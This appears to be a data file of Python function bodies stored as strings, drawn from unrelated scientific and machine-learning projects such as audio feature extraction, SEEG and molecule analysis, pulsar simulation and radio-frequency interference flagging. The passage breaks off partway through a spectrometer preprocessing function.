"def compute_all_features(mp3_file):\n # Decode and read mp3\n audio, _ = librosa.load(mp3_file, sr=SR)\n\n # Compute mels\n mel = compute_melspecs(audio)\n\n # Save\n out_file = os.path.join(\n OUTPUT_DIR, os.path.basename(mp3_file).replace(\".mp3\", \"-mel.npy\"))\n np.save(out_file, mel)",
"def preprocess_data(self):\n # Fault and cavity models use same data and features. Get that now.\n signals = get_signal_names(cavities=['1', '2', '3', '4', '5', '6', '7', '8'],\n waveforms=['GMES', 'GASK', 'CRFP', 'DETA2'])\n\n # We need to crop, downsample, then do z-score. Any constant values are set to 0.001 manually.\n num_resample = 4096\n num_meta_columns = 8\n self.common_features_df = window_extractor(self.example, signals=signals, windows={'pre-fault': -1533.4},\n n_samples=7680, standardize=False, downsample=True,\n ds_kwargs={'num': num_resample})\n\n # The extractor makes a row per requested window plus some metadata. Columns are named\n # Sample_<sample_num>_<cav_num>_<signal>, and go Sample_1_1_GMES, Sample_2_1_GMES, ..., Sample_1_1_GASK, ....\n # We want to change this so that each column is all of the samples for 1_GMES, 1_GASK, ... as in the signal\n # order above.\n self.common_features_df = pd.DataFrame(\n self.common_features_df.iloc[0, num_meta_columns:].values.reshape(len(signals), -1).T, columns=signals)\n\n self.common_features_df = standard_scaling(self.common_features_df, fill=0.001)",
"def save_predict_results():\n\n ori_lst = []\n for i in range(1, 4):\n ori_df = pd.read_csv('Training_Model'+str(i)+'.csv')\n ori_list = ori_df['SMILES'].tolist()\n ori_lst.append(ori_list)\n frames = []\n gen_mols = []\n gen_fps = []\n for i, group in enumerate(['all', 'class3', 'prom']):\n gen_df = pd.read_csv('novel_sampled_cano_script_'+group+'_until.csv')\n gen_list = gen_df['SMILES'].tolist()\n print('Number of molecules in training for model {} is {}'.format(i+1, len(ori_lst[i])))\n over, num, smi_list = get_smi_list_overlap(ori_lst[i], gen_list)\n smi_mols = get_mols(smi_list)\n smi_fps, failed_mols = get_fingerprints(smi_mols)\n for idx in sorted(failed_mols, reverse=True):\n del smi_list[idx]\n smi_df = pd.Series(data=smi_list, name='SMILES').to_frame()\n smi_df.loc[:,'Group'] = i+1\n frames.append(smi_df)\n\n unique_df = pd.concat(frames)\n gen_smi = unique_df['SMILES'].tolist()\n gen_mols = get_mols(gen_smi)\n gen_fps, _ = get_fingerprints(gen_mols)\n unique_df['Gaps'] = predict_property('gbdt_regessor_gap_regu.joblib', gen_fps)\n unique_df['Dips'] = predict_property('gbdt_regessor_dip_reg.joblib', gen_fps)\n promising_df = unique_df.loc[(unique_df['Gaps'] <= 2.0) & (unique_df['Dips']<=3.66)]\n unique_df.to_csv('Unique_models_15epoch.csv', index=False)\n promising_df.to_csv('Promising_models_15epoch.csv', index=False)",
"def run_regression_experiments(self):\n assert self.patientIDs # assert not empty\n self.log.info(\"Running experiments for {} patients\".format(len(self.patientIDs)))\n\n results_batch = defaultdict(dict)\n results_single = dict()\n for patient in self.patientIDs:\n patient_experiment = PatientPredictionExperiment(\n patient_id=patient, algorithm=self.algorithm,\n is_batch=self.isBatch\n )\n # run results for single patients\n if not self.isBatch:\n results_single[patient] = patient_experiment.run_experiment()\n self.log.debug(\"Start processing single results: {}\".format(results_single[patient]))\n # super verbose debug information should be logged with debug option\n else:\n # TODO: think about consistent interfaces\n batch_results, self._allFeatureDesp = patient_experiment.run_experiment()\n self.log.info(\"Start processing batch results with {} batches\".format(len(batch_results)))\n batchNo = 0\n for results in batch_results:\n # here are the result for each feature subset for each patients\n results_batch[batchNo][patient] = results\n batchNo += 1\n if self.algorithm == \"fm\":\n return\n if not self.isBatch:\n results_overall = self.process_results(results_single)\n self.store_results(results_overall, results_single)\n self.log.info(\"Finished running experiment\")\n else:\n self.record_batch_experiment()\n for batchNo, patient_results in results_batch.iteritems():\n # patient_results = results_single\n results_overall = self.process_results(patient_results)\n self.store_results(results_overall, patient_results, self._allFeatureDesp[batchNo])\n self.log.info(\"Finished running experiment No. {}\".format(batchNo))",
"def RUN_PULSAR(numTrials, rateMap, numPhotons=48,numPulsars = 6, angularSize=10.0, outputSize=100, mcList='MCOut.pickle',flatLevel = 0.0,HESS=False, Sig = -1,numProcs = 10):\r\n import FermiPSF, ParseFermi\r\n \r\n print 'Beginning MC Series\\nProgress'\r\n\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n partial_MC_PULSAR_THREAD = partial( MC_PULSAR_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize, numPulsars = numPulsars,Sig=Sig)\r\n mcOut = p.map(partial_MC_PULSAR_THREAD, mcOut)\r\n \r\n# for i in range(numTrials):\r\n# np.random.seed()\r\n# # Compute number of background photons\r\n# numSignal = np.random.poisson(lam = .25*numPhotons)\r\n# if (HESS == True):\r\n# numSignal = np.random.poisson(lam = .05*numPhotons)\r\n# if Sig >= 0:\r\n# numSignal = np.random.poisson(lam = Sig*numPhotons)\r\n# \r\n# bg = numPhotons-numSignal # number of BG photons\r\n# \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack ,HESS=HESS, angularSize = angularSize )\r\n# \r\n# \r\n# # Run MC for source photons \r\n# data = MC_PULSAR(map,numSignal, numPulsars,angularSize,outputSize,PSFTableFront, PSFTableBack, HESS = HESS)\r\n# # Concatenate and append this run to the simulation output\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def run(self):\n\n for file_cnt, file_path in enumerate(self.files_found):\n video_timer = SimbaTimer()\n video_timer.start_timer()\n _, self.video_name, _ = get_fn_ext(file_path)\n self.video_info, self.px_per_mm, self.fps = self.read_video_info(\n video_name=self.video_name\n )\n self.width, self.height = int(\n self.video_info[\"Resolution_width\"].values[0]\n ), int(self.video_info[\"Resolution_height\"].values[0])\n if self.video_setting:\n self.fourcc = cv2.VideoWriter_fourcc(*Formats.MP4_CODEC.value)\n self.video_save_path = os.path.join(\n self.heatmap_clf_location_dir, self.video_name + \".mp4\"\n )\n self.writer = cv2.VideoWriter(\n self.video_save_path,\n self.fourcc,\n self.fps,\n (self.width, self.height),\n )\n if self.frame_setting:\n self.save_video_folder = os.path.join(\n self.heatmap_clf_location_dir, self.video_name\n )\n if not os.path.exists(self.save_video_folder):\n os.makedirs(self.save_video_folder)\n self.data_df = read_df(file_path=file_path, file_type=self.file_type)\n clf_array, aspect_ratio = self.__calculate_bin_attr(\n data_df=self.data_df,\n clf_name=self.clf_name,\n bp_lst=self.bp_lst,\n px_per_mm=self.px_per_mm,\n img_width=self.width,\n img_height=self.height,\n bin_size=self.bin_size,\n fps=self.fps,\n )\n\n if self.max_scale == \"auto\":\n self.max_scale = self.__calculate_max_scale(clf_array=clf_array)\n if self.max_scale == 0:\n self.max_scale = 1\n\n if self.final_img_setting:\n self.make_clf_heatmap_plot(\n frm_data=clf_array[-1, :, :],\n max_scale=self.max_scale,\n palette=self.palette,\n aspect_ratio=aspect_ratio,\n file_name=os.path.join(\n self.heatmap_clf_location_dir,\n self.video_name + \"_final_frm.png\",\n ),\n shading=self.shading,\n clf_name=self.clf_name,\n img_size=(self.width, self.height),\n final_img=True,\n )\n\n if self.video_setting or self.frame_setting:\n for frm_cnt, cumulative_frm_idx in enumerate(range(clf_array.shape[0])):\n frm_data = clf_array[cumulative_frm_idx, :, :]\n cum_df = pd.DataFrame(frm_data).reset_index()\n cum_df = cum_df.melt(\n id_vars=\"index\",\n value_vars=None,\n var_name=None,\n value_name=\"seconds\",\n col_level=None,\n ).rename(\n columns={\"index\": \"vertical_idx\", \"variable\": \"horizontal_idx\"}\n )\n cum_df[\"color\"] = (\n (cum_df[\"seconds\"].astype(float) / float(self.max_scale))\n .round(2)\n .clip(upper=100)\n )\n color_array = np.zeros(\n (\n len(cum_df[\"vertical_idx\"].unique()),\n len(cum_df[\"horizontal_idx\"].unique()),\n )\n )\n for i in range(color_array.shape[0]):\n for j in range(color_array.shape[1]):\n value = cum_df[\"color\"][\n (cum_df[\"horizontal_idx\"] == j)\n & (cum_df[\"vertical_idx\"] == i)\n ].values[0]\n color_array[i, j] = value\n\n fig = plt.figure()\n im_ratio = color_array.shape[0] / color_array.shape[1]\n plt.pcolormesh(\n color_array,\n shading=self.shading,\n cmap=self.palette,\n rasterized=True,\n alpha=1,\n vmin=0.0,\n vmax=float(self.max_scale),\n )\n plt.gca().invert_yaxis()\n plt.xticks([])\n plt.yticks([])\n plt.axis(\"off\")\n plt.tick_params(axis=\"both\", which=\"both\", length=0)\n cb = plt.colorbar(pad=0.0, fraction=0.023 * im_ratio)\n cb.ax.tick_params(size=0)\n cb.outline.set_visible(False)\n cb.set_label(\n \"{} (seconds)\".format(self.clf_name), rotation=270, labelpad=10\n )\n plt.tight_layout()\n plt.gca().set_aspect(aspect_ratio)\n canvas = FigureCanvas(fig)\n canvas.draw()\n mat = np.array(canvas.renderer._renderer)\n image = cv2.cvtColor(mat, cv2.COLOR_RGB2BGR)\n image = cv2.resize(image, (self.width, self.height))\n image = 
np.uint8(image)\n plt.close()\n\n if self.video_setting:\n self.writer.write(image)\n if self.frame_setting:\n frame_save_path = os.path.join(\n self.save_video_folder, str(frm_cnt) + \".png\"\n )\n cv2.imwrite(frame_save_path, image)\n print(\n \"Created heatmap frame: {} / {}. Video: {} ({}/{})\".format(\n str(frm_cnt + 1),\n str(len(self.data_df)),\n self.video_name,\n str(file_cnt + 1),\n len(self.files_found),\n )\n )\n\n if self.video_setting:\n self.writer.release()\n\n video_timer.stop_timer()\n print(\n \"Heatmap plot for video {} saved (elapsed time: {}s) ... \".format(\n self.video_name, video_timer.elapsed_time_str\n )\n )\n\n self.timer.stop_timer()\n stdout_success(\n msg=\"All heatmap visualizations created in project_folder/frames/output/heatmaps_classifier_locations directory\",\n elapsed_time=\"self.timer.elapsed_time_str\",\n )",
"def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]",
"def calculate_mixture_features(args):\n workspace = args.workspace\n speech_dir = args.speech_dir\n noise_dir = args.noise_dir\n data_type = args.data_type\n fs = cfg.sample_rate\n dir_name = args.dir_name\n\n fid_clean = open(speech_dir, 'r')\n lines_clean = fid_clean.readlines()\n fid_clean.close()\n\n fid_reverb = open(noise_dir, 'r')\n lines_reverb = fid_reverb.readlines()\n fid_reverb.close()\n\n for files_clean, files_reverb in zip(lines_clean, lines_reverb):\n\n files_clean = files_clean.strip('\\n')\n files_reverb = files_reverb.strip('\\n')\n\n fid = open(files_clean,'r')\n wavLines_clean = fid.readlines()\n fid.close()\n fid = open(files_reverb,'r')\n wavLines_reverb = fid.readlines()\n fid.close()\n\n cnt = 0 \n\n for wavs_clean, wavs_reverb in zip(wavLines_clean, wavLines_reverb):\n \n t1 = time.time()\n # cnt = 0\n\n wav_name_clean, wav_path_clean = wavs_clean.split()\n wav_name_reverb, wav_path_reverb = wavs_reverb.split()\n \n # Read clean speech audio. \n (speech_audio, _) = read_audio(wav_path_clean, target_fs=fs)\n \n # Read reverb speech audio. \n (noise_audio, _) = read_audio(wav_path_reverb, target_fs=fs)\n \n # Cut reverb speech to the same length as clean speech. \n if len(noise_audio) > len(speech_audio):\n noise_audio = noise_audio[0: len(speech_audio)]\n \n # Extract spectrogram. \n mixed_complx_x = calc_sp(noise_audio, mode='complex')\n speech_x = calc_sp(speech_audio, mode='magnitude')\n\n # Write out features. \n out_feat_path = os.path.join(workspace, \"features\", \"spectrogram\", \n data_type, dir_name, \"%s.p\" % wav_name_reverb)\n create_folder(os.path.dirname(out_feat_path))\n data = [mixed_complx_x, speech_x, wav_name_reverb]\n pickle.dump(data, open(out_feat_path, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n \n # Print. \n if cnt % 100 == 0:\n print(cnt)\n # print(mixed_complx_x)\n # print(speech_x)\n \n cnt += 1\n\n print(\"Extracting feature time: %s\" % (time.time() - t1))",
"def main():\n\n pathfolder = \"/home/vanessa/DATA_SEEG/PKL_FILE/\"\n filename = \"/data.pkl\"\n # pathfolder = argv[1]\n # filename = argv[2]\n\n ti = 10. # initial time\n tf = 590. # final time\n t_split = 300. # split\n fs = 1000. # sampling frequency\n powerline = 50.\n\n thresholds = np.load(\"threshold.npy\") # load the threshold file\n meanthresh = thresholds.mean(axis=0)[1::2]\n stdthresh = thresholds.std(axis=0)[1::2]\n\n # features = 159 # classification features + (x,y,z)-coordinates\n\n for ii, id in enumerate(os.listdir(pathfolder)):\n\n print(id)\n\n df = pd.read_pickle(pathfolder + id + filename)\n\n validchannels = np.where(~df.loc[:, \"PTD\"].isnull())[0] # remove NaN values\n\n df = df.iloc[validchannels, :]\n _, p = df.shape\n\n timeseries = df.values[:, :-5] # we are not considering Y, ptd, coordinates\n\n data = remove_powerline(timeseries, fs) # remove power line effects\n\n #################### split into 2 fragments ############################\n\n split1half = data[:, int(fs*ti):int(fs*t_split)]\n split2half = data[:, int(fs*t_split):int(fs*tf)]\n\n timefeat1half = merge_temporal_features(split1half, fs, powerline,\n meanthresh)\n timefeat2half = merge_temporal_features(split2half, fs, powerline,\n meanthresh)\n\n ########################################################################\n\n cc = [df.index[t] for t in range(len(df.index))]\n arrays = [[id]*(2*len(df.index)), cc + cc]\n\n tuples = list(zip(*arrays))\n index = pd.MultiIndex.from_tuples(tuples, names=['patient', 'channel'])\n\n # temporal features from SEEG\n timefeatdf = pd.DataFrame(data=np.vstack((timefeat1half,\n timefeat2half)), index=index)\n\n # spatial features for MRI\n spacefeat = df.values[:, -4:]\n spacefeatdf = pd.DataFrame(data=np.vstack((spacefeat, spacefeat)),\n index=index, columns=\n ['PTD', 'xcoor', 'ycoor', 'zcoor'])\n\n # y labels\n ylab = df.values[:, -5]\n Ylabel = pd.DataFrame(data=np.append(ylab, ylab), index=index,\n columns=[\"Y\"])\n\n # pickle file in output\n outputpkl = pd.concat([timefeatdf, spacefeatdf, Ylabel], axis=1)\n\n outputpkl.to_pickle(pathfolder + id + \"/features.pkl\")\n\n if ii == 0:\n ddd = outputpkl\n else:\n ddd = pd.concat([ddd, outputpkl], axis=0)\n\n ddd.to_pickle(pathfolder + \"classificationset.pkl\")",
"def extract_training_data(qrel_dict, pipeline, n_cores=-1, cache_path='doc_cache', verbose=True):\n # query-document pairs\n qd_pairs = qrel_dict['qd_pairs']\n\n # all document ids this set refers to\n trec_ids = qrel_dict['trec_ids']\n trec_to_doc_dict = None\n if pipeline is not None:\n # print('### Retrieving documents ###')\n # a dict that houses a Document for each id, read from the cache\n # trec_to_doc_dict = retrieve_docs_from_cache(trec_ids, cache_path=cache_path,verbose=verbose,n_cores=n_cores)\n print('### Extracting features ###')\n # single process\n if n_cores is 1:\n total = extract_training_dataframe(qd_pairs,pipeline,cache_path=cache_path,verbose=verbose)\n # multiple processes\n else:\n # if the number is unspecified\n if n_cores is -1:\n # one process per core\n n_cores = multiprocessing.cpu_count()\n\n pool = multiprocessing.Pool(processes=n_cores)\n\n # split into a list of lists, one per process\n chunked_key_lists = chunk_list(list(qd_pairs.keys()), n_cores)\n # chunked: each chunk is a subdictionary (i.e. a number of qd pairs)\n chunked = []\n\n # make a dict of lists, one list per core\n temp = [(i,[]) for i in range(n_cores)]\n doc_set_dict = dict(temp)\n\n for i, key_list in enumerate(chunked_key_lists):\n temp = {}\n for key in key_list:\n # get the qd_pair at this key\n pair = qd_pairs[key]\n # all the docs needed by this query\n docs = list(pair['rels'].keys())\n # look at the doc_set_dict, check whether there'd be overlap\n doc_set_dict[i].append(docs)\n temp[key] = qd_pairs[key]\n\n chunked.append(temp)\n\n doc_set_dict_flat = {}\n # flatten each of the sublists to get an overview of all the docs needed\n for core_key in doc_set_dict.keys():\n list_of_lists = doc_set_dict[core_key]\n doc_set_dict_flat[core_key] = list(itertools.chain(*list_of_lists))\n\n # generate all combinations of cores\n core_keys = list(doc_set_dict.keys())\n for pair in itertools.combinations(core_keys,2):\n # check if there is any overlap between the two\n docs_0 = doc_set_dict_flat[pair[0]]\n docs_1 = doc_set_dict_flat[pair[1]]\n print(pair)\n overlap = [id for id in docs_0 if id in docs_1]\n print(len(overlap))\n\n\n # use the partial functool here: this allows us to keep some paramters fixed\n # the multiprocessing logic will thus only operate on the first parameter,\n # passing different chunks to the extraction function\n\n # we get a list of dataframes that house X, y, ids (one for each process)\n pool_outputs = pool.map(partial(extract_training_dataframe, pipeline=pipeline,\n cache_path=cache_path, verbose=verbose),\n chunked)\n\n # concat all the frames into a single one\n total = pd.concat(pool_outputs)\n\n # get rid of the pool\n pool.close()\n pool.join()\n\n return total",
"def run_xrfi(\n *,\n method: str,\n spectrum: np.ndarray,\n freq: np.ndarray,\n weights: Optional[np.ndarray] = None,\n flags: Optional[np.ndarray] = None,\n n_threads: int = cpu_count(),\n fl_id=None,\n **kwargs,\n) -> np.ndarray:\n rfi = getattr(xrfi, f\"xrfi_{method}\")\n\n if weights is None:\n if flags is None:\n weights = np.ones_like(spectrum)\n else:\n weights = (~flags).astype(float)\n\n if flags is not None:\n weights = np.where(flags, 0, weights)\n\n if spectrum.ndim in rfi.ndim:\n flags = rfi(spectrum, weights=weights, **kwargs)[0]\n elif spectrum.ndim > max(rfi.ndim) + 1:\n # say we have a 3-dimensional spectrum but can only do 1D in the method.\n # then we collapse to 2D and recursively run xrfi_pipe. That will trigger\n # the *next* clause, which will do parallel mapping over the first axis.\n orig_shape = spectrum.shape\n new_shape = (-1,) + orig_shape[2:]\n flags = run_xrfi(\n spectrum=spectrum.reshape(new_shape),\n weights=weights.reshape(new_shape),\n freq=freq,\n method=method,\n n_threads=n_threads,\n **kwargs,\n )\n return flags.reshape(orig_shape)\n else:\n n_threads = min(n_threads, len(spectrum))\n\n # Use a parallel map unless this function itself is being called by a\n # parallel map.\n wrns = defaultdict(lambda: 0)\n\n def count_warnings(message, *args, **kwargs):\n wrns[str(message)] += 1\n\n old = warnings.showwarning\n warnings.showwarning = count_warnings\n\n if current_process().name == \"MainProcess\" and n_threads > 1:\n\n def fnc(i):\n # Gets the spectrum/weights from the global var dict, which was\n # initialized by the pool.\n # See https://research.wmz.ninja/articles/2018/03/on-sharing-large-\n # arrays-when-using-pythons-multiprocessing.html\n spec = np.frombuffer(_globals[\"spectrum\"]).reshape(_globals[\"shape\"])[i]\n wght = np.frombuffer(_globals[\"weights\"]).reshape(_globals[\"shape\"])[i]\n\n if np.any(wght > 0):\n return rfi(spec, freq=freq, weights=wght, **kwargs)[0]\n else:\n return np.ones_like(spec, dtype=bool)\n\n shared_spectrum = RawArray(\"d\", spectrum.size)\n shared_weights = RawArray(\"d\", spectrum.size)\n\n # Wrap X as an numpy array so we can easily manipulates its data.\n shared_spectrum_np = np.frombuffer(shared_spectrum).reshape(spectrum.shape)\n shared_weights_np = np.frombuffer(shared_weights).reshape(spectrum.shape)\n\n # Copy data to our shared array.\n np.copyto(shared_spectrum_np, spectrum)\n np.copyto(shared_weights_np, weights)\n\n p = Pool(\n n_threads,\n initializer=_init_worker,\n initargs=(shared_spectrum, shared_weights, spectrum.shape),\n )\n m = p.map\n else:\n\n def fnc(i):\n if np.any(weights[i] > 0):\n return rfi(spectrum[i], freq=freq, weights=weights[i], **kwargs)[0]\n else:\n return np.ones_like(spectrum[i], dtype=bool)\n\n m = map\n\n results = m(fnc, range(len(spectrum)))\n flags = np.array(list(results))\n\n warnings.showwarning = old\n\n # clear global memory (not sure if it still exists)\n _init_worker(0, 0, 0)\n\n fl_id = f\"{fl_id}: \" if fl_id else \"\"\n\n if wrns:\n for msg, count in wrns.items():\n msg = msg.replace(\"\\n\", \" \")\n logger.warning(\n f\"{fl_id}Received warning '{msg}' {count}/{len(flags)} times.\"\n )\n\n return flags",
"def Run_Extraction(self):\n\n # print the summary of the model\n print(self.ww_model.model.summary(), end=\"\\n\\n\", flush=True)\n # open an audio data stream\n self.stream = self.p.open(format=self.format, channels=self.channels,\n rate=self.rate, input=True,\n frames_per_buffer=self.chunk)\n\n act_count = 0\n\n while True:\n\n # reads chunk of audio\n data = self.stream.read(self.chunk)\n\n # appends chunk to frame list\n self.frames.append(data)\n\n # begins making predictions after the first\n # 2.5 seconds of audio is read\n if (len(self.frames) > 19):\n\n prediction = self.Prediction()\n\n # if the predictions is larger than the defined confidence\n if (prediction > self.confidence):\n\n # increment the activation counter\n act_count += 1\n\n # if the number of consecutive activations\n # exceeds the activation value\n if(act_count >= self.activations):\n\n # print out \"nimbus\"\n print(\" << nimbus >> \", end=\" \", flush=True)\n\n # reset activation count\n act_count = 0\n\n self.False_Activation()\n\n self.frames = self.frames[18:]\n\n if (self.false_counts >= self.false_count):\n self.Retrain_Model()\n\n # if prediction falls below the confidence level\n else:\n\n # reset the activation count\n act_count = 0\n\n if not(self.print_pred):\n # output nothing to the stream\n print(\"-\", end=\"\", flush=True)\n\n # window the data stream\n self.frames = self.frames[1:]",
"def demo_train(ts_struct_list, frc_model=None, fg_mdl=None, fs_mdl=None, verbose=False,\n return_model=False, rewrite=True):\n\n # Check arguments:\n if fg_mdl is None:\n fg_mdl = frc_class.IdentityGenerator(name=\"Identity generator\", on=False)\n\n if fs_mdl is None:\n fs_mdl = gnt_class.FeatureGeneration() # IdentityModel(name=\"Identity selector\")\n\n if frc_model is None:\n frc_model = frc_class.CustomModel(Lasso, name=\"Lasso\", alpha=0.01)\n\n model = frc_class.PipelineModel(gen_mdl=fg_mdl, sel_mdl=fs_mdl, frc_mdl=frc_model)\n results = []\n res_text = []\n\n for ts in ts_struct_list:\n data = regression_matrix.RegMatrix(ts, x_idx=TS_IDX, y_idx=TS_IDX)\n\n # Create regression matrix\n data.create_matrix(nsteps=N_STEPS, norm_flag=True) # this creates data.Y, data.X and some other fields\n\n # Split data for training and testing\n data.train_test_split(TRAIN_TEST_RATIO)\n\n # train the model. This returns trained pipeline and its steps\n model, frc, gen, sel = model.train_model(data.trainX, data.trainY)\n\n selection_res = \"\\n Feature selection results: problem status {}, selected {} from {} \\\\\\\\ \\n\".\\\n format(sel.status, len(sel.selected), sel.n_vars)\n\n frcY, _ = data.forecast(model) # returns forecasted matrix of the same shape as data.Y\n # frcY, idx_frc = data.forecast(model, idx_rows=data.idx_test) # this would return forecasts only for data.testY\n\n data.plot_frc(n_frc=5, n_hist=10, folder=SAVE_DIR) #this saves figures into SAVE_DIR\n\n train_mae = data.mae(idx_rows=data.idx_train, idx_original=data.original_index)\n train_mape = data.mape(idx_rows=data.idx_train, idx_original=data.original_index)\n\n test_mae = data.mae(idx_rows=data.idx_test, idx_original=data.original_index)\n test_mape = data.mape(idx_rows=data.idx_test, idx_original=data.original_index)\n\n index = [ts.data[i].name for i in TS_IDX]\n res1 = pd.DataFrame(train_mae, index=index, columns=[(\"MAE\", \"train\")])\n res2 = pd.DataFrame(train_mape, index=index, columns=[(\"MAPE\", \"train\")])\n res3 = pd.DataFrame(test_mae, index=index, columns=[(\"MAE\", \"test\")])\n res4 = pd.DataFrame(test_mape, index=index, columns=[(\"MAPE\", \"test\")])\n res = pd.concat([res1, res2, res3, res4], axis=1)\n\n configuration_str = \"\\n Time series {} forecasted with {} + '{}' feature generation model and \" \\\n \"'{}' feature selection model \\\\\\\\ \\n\".format(ts.name, frc.name, gen.name, sel.name)\n if verbose:\n print(configuration_str)\n print(selection_res)\n print(res)\n\n results.append(res)\n res_text.append(configuration_str)\n res_text.append(selection_res)\n\n saved_mdl_fname = model.save_model(file_name=FNAME_PREFIX, folder=SAVE_DIR) # saving in not an option yet\n # model = frc_class.PipelineModel().load_model(file_name=fname)\n\n # write results into a latex file\n my_plots.save_to_latex(results, df_names=res_text, folder=SAVE_DIR, rewrite=rewrite)\n print(\"Results saved to folder {}\".format(SAVE_DIR))\n\n if return_model:\n return model, saved_mdl_fname\n\n return saved_mdl_fname",
"def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)",
"def pre_process(self):\n t1_start = perf_counter()\n wav_arr_raw = np.array(self.raw_data['spectrum_0'].attrs['wavelengths'])\n self.wavelengths = wav_arr_raw\n self.back_spectra_arr = np.array(self.raw_data['spectrum_0'].attrs['background'])\n\n corr_data = []\n times_proc = []\n\n # extract reference point for 0 seconds\n time_ref = str(self.raw_data['spectrum_0'].attrs['creation_timestamp'])\n\n # spectrometer adds 'b' and quotation marks to timestamps that must be removed\n # some spectra are taken on X.000000s which does not have a .%f component - use try and except\n try:\n time_ref = datetime.strptime((time_ref.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S.%f\")\n except ValueError:\n time_ref = datetime.strptime((time_ref.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S\")\n\n print('Measurement was started at {}, \\n normalising times and applying a background correction \\n'.format(time_ref))\n\n # applies background correction\n for counter, spectra in enumerate(self.raw_data.keys()):\n corr_data.append(self.raw_data[spectra]-self.back_spectra_arr)\n time = str(self.raw_data[spectra].attrs['creation_timestamp'])\n try:\n time = 